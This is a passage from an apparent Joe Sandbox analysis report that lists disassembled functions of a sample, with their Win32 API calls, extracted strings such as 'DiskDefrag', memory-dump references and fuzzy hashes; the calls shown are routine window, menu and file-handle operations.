                                                                                                                                                                                                                                                                                    • Opcode ID: 16f18f1a933ed431d929bf9bf4f35c33f1afd78cf992d5ee3e1820be59300b6a
                                                                                                                                                                                                                                                                                    • Instruction ID: 9e016845d88e4024dd1218f79a327356caeee79904b42a6c0a28c628b7da3379
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16f18f1a933ed431d929bf9bf4f35c33f1afd78cf992d5ee3e1820be59300b6a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2691E0712047009BD710EF24DD85FDAB7E5BF98704F00092EF945AB286DB78E945CBAA
                                                                                                                                                                                                                                                                                    Function 0042CCB0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 192windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000133D,00000000,00000001), ref: 0042CE5B
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,?,BB40E64E,?,?,?,?,?,?,?,?,?,004217B6), ref: 0042CEBD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042CEF4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042CF49
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$RedrawWindow
                                                                                                                                                                                                                                                                                    • String ID: %s (%c:)$%s (%s)$3401034$3401126$8F
                                                                                                                                                                                                                                                                                    • API String ID: 648961319-806376751
                                                                                                                                                                                                                                                                                    • Opcode ID: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                    • Instruction ID: fd74af85edc4f78d52bbe53b36b76dc0b3b7e67d0ab5ffb778a9a62391dde0ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E718D716043409FD324DF64DD85FABBBF4EF88700F10492EFA5A96290DBB4A944CB5A
                                                                                                                                                                                                                                                                                    Function 00456AB0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00456B14
                                                                                                                                                                                                                                                                                      • Part of subcall function 00454290: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00454306
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00456B57
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00456B7E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00456BA5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00456BD6
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000001,00000000), ref: 00456C07
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000001,00000001), ref: 00456C38
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00456C5F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$CreateFileUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: \\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 1066634676-259948872
                                                                                                                                                                                                                                                                                    • Opcode ID: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                    • Instruction ID: 9c2aacaccead671dbc3a96f70d0e1eab3c71fbf61e1a23b3dd7d7caf89dd1f7c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C75109377043006BD214AF69AC86BAEB394EF9C725F80013FF509D3282DA255548C7AB
                                                                                                                                                                                                                                                                                    Function 00465A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00465A5F
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00465A78
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00465B27
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00465B49
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00465B61
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00465BA5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$ClientMessageParentReleaseSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F$Button_Check$F
                                                                                                                                                                                                                                                                                    • API String ID: 330964712-3764646934
                                                                                                                                                                                                                                                                                    • Opcode ID: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                    • Instruction ID: b1a5f572caf67006923a9ef52c219ce68de25ddbd2c2a7f7615237fc757273c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0510371600B019FD324DF79C889BA7B3E9BF88704F008A1DE5AA97281DB74B854CF59
                                                                                                                                                                                                                                                                                    Function 00421BC0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 126windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,BB40E64E), ref: 00421BFF
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00421C0A
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 00421C48
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000001), ref: 00421C73
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CursorLoadRectWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401014$3401015$3401098$3401131$^H
                                                                                                                                                                                                                                                                                    • API String ID: 539701409-2488738715
                                                                                                                                                                                                                                                                                    • Opcode ID: f201b73e3f44a350be9c0be91d5a56932565eb1e6c8c0a690cc3ab9f05582354
                                                                                                                                                                                                                                                                                    • Instruction ID: aabc8bb0dc6c93bda9c7aa98bf8ca1edfc519584f33f3993db52bfb4b78a6ed8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f201b73e3f44a350be9c0be91d5a56932565eb1e6c8c0a690cc3ab9f05582354
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A41B6B17543406AD324AB65DC42FAF73A8AF84B14F108A1FB65EA26C0CE7CA405879D
                                                                                                                                                                                                                                                                                    Function 00402760 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 004027B1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 00402863
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402041$3402042$8F$DiskDefrag$Images$close$open
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2649565445
                                                                                                                                                                                                                                                                                    • Opcode ID: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                    • Instruction ID: 8150cbd10707325bb4a07bc8764e9056bc1ba0aa629cfab9f1adae748ae802a6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8319EB579020027D61576254EA6FBE21661FC4B48F25C22FB30E7B3C2DEED9C41429E
                                                                                                                                                                                                                                                                                    Function 0042EA80 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0042EAE3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 0042EAF7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 0042EB36
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402007$3402033$3402037$3402038$3402039$3402040
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3173017236
                                                                                                                                                                                                                                                                                    • Opcode ID: 6cbccfbbc1fd63c8a78153f1b809b30710d94fdfea326ecc7c254d81bae311d8
                                                                                                                                                                                                                                                                                    • Instruction ID: f302c9e8cacf912969436f53e573b816ab0f893bb8e7c3a9347613e7e3a9d812
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cbccfbbc1fd63c8a78153f1b809b30710d94fdfea326ecc7c254d81bae311d8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0021D7F0BE074035E6B5BA614D43FEE21295F84F49F20880BB75E7A9C2CADC3941629D
                                                                                                                                                                                                                                                                                    Function 004537A0 Relevance: 15.3, APIs: 10, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                    • Instruction ID: be2023aef89e17b54fd3cfd96c880170c5f98da2cba37ae09b4ebda1ed5f38f7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79C1F4B56083448FC310DF69C884A5BFBE9BFC9714F148A5EE9888B361C775E905CB92
                                                                                                                                                                                                                                                                                    Function 00409D40 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CopyRect
                                                                                                                                                                                                                                                                                    • String ID: Bottom$Left$Margin$Right$Top$`=$=
                                                                                                                                                                                                                                                                                    • API String ID: 1989077687-1885521073
                                                                                                                                                                                                                                                                                    • Opcode ID: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                    • Instruction ID: 7cbf7df4fec77659c91c3afac7ac99305081f53a3d300e0ff47080e44fb4b669
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EB166766043419FC310DF28C881B5BB7E8FB98704F148A2EF58A97391DB75E944CB9A
                                                                                                                                                                                                                                                                                    Function 00410D00 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 3401059$3401060$3401061$3401062$<a>%s</a>$LG
                                                                                                                                                                                                                                                                                    • API String ID: 0-1992925794
                                                                                                                                                                                                                                                                                    • Opcode ID: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                    • Instruction ID: 570f8eb3785bc855bef0c474daa2501289258084391a13b0a6423d05570a55ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D81D7717543005BC714EF218C42BDA33A4AF88714F14853FBA0D6B2C6DBB9E985879E
                                                                                                                                                                                                                                                                                    Function 004181A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 004181B6
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000006), ref: 00418204
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,000003FD), ref: 0041827F
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,000003FD), ref: 004182FA
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041833E
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00418350
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000003,0000FFFE), ref: 004183AA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectWindow$ClientMessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 1071774122-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
